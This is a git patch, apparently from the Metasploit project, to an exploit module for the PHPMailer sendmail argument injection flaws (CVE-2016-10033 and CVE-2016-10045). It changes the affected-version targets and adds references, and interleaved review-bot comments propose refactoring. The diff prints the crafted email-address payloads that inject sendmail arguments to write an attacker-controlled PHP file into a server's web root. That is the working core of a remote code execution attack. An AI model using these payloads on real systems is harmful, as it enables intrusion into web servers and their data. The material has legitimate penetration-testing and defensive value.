From cd90fd3b1cd430628265db0b1a899e13cae05554 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 30 Dec 2016 15:31:15 -0500 Subject: [PATCH] Fix PHPMailer targets since 5.2.20 is not affected --- .../exploits/multi/http/phpmailer_arg_injection.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb index 71ecc020e4..c46581147d 100644 --- a/modules/exploits/multi/http/phpmailer_arg_injection.rb +++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PHPMailer Sendmail Argument Injection', 'Description' => %q{ - PHPMailer versions up to and including 5.2.20 are affected by a + PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module @@ -31,6 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-10033'], + ['CVE', '2016-10045'], + ['EDB', '40968'], ['EDB', '40969'], ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'], ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html'] @@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_PHP, 'Payload' => {'DisableNops' => true}, 'Targets' => [ - ['PHPMailer <=5.2.18', {}], - ['PHPMailer 5.2.20', {}] + ['PHPMailer <5.2.18', {}], + ['PHPMailer 5.2.18 - 5.2.19', {}] ], 'DefaultTarget' => 0 )) 
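Review bot: The renamed labels in the `'Targets'` array are also the lookup keys for the `if target.name == ...` branch in the later hunk (`@@ -95,10 +97,10`), so this rename had to be made in two places. A label that drifts in only one of them would surface only at run time, in the `fail_with(Failure::NoTarget, ...)` branch. Keeping the label as display text and branching on a value in the options hash would remove that coupling, e.g. `['PHPMailer <5.2.18', { 'Variant' => :pre_5_2_18 }]` with `case target['Variant']` (the key and symbol names are constructed examples). The `update_info` call and the class body continue outside this hunk.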
@@ -95,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote payload_file_name = "#{rand_text_alphanumeric(8)}.php" payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}" - if target.name == 'PHPMailer <=5.2.18' + if target.name == 'PHPMailer <5.2.18' email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com" - elsif target.name == 'PHPMailer 5.2.20' - email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com" + elsif target.name == 'PHPMailer 5.2.18 - 5.2.19' + email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com" else fail_with(Failure::NoTarget, 'The specified version is not supported') end
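Review bot: The two `email` assignments now differ only in the escape sequence after the first random token (`\\\"` versus `\\'`), and nothing in the branch says why or which advisory each form belongs to. A one-line comment above each branch would make that difference reviewable, for instance `# CVE-2016-10033: releases before 5.2.18` and `# CVE-2016-10045: 5.2.18 - 5.2.19`. That mapping is inferred from the references this commit adds and should be confirmed by the author. The enclosing method starts and ends outside the hunk.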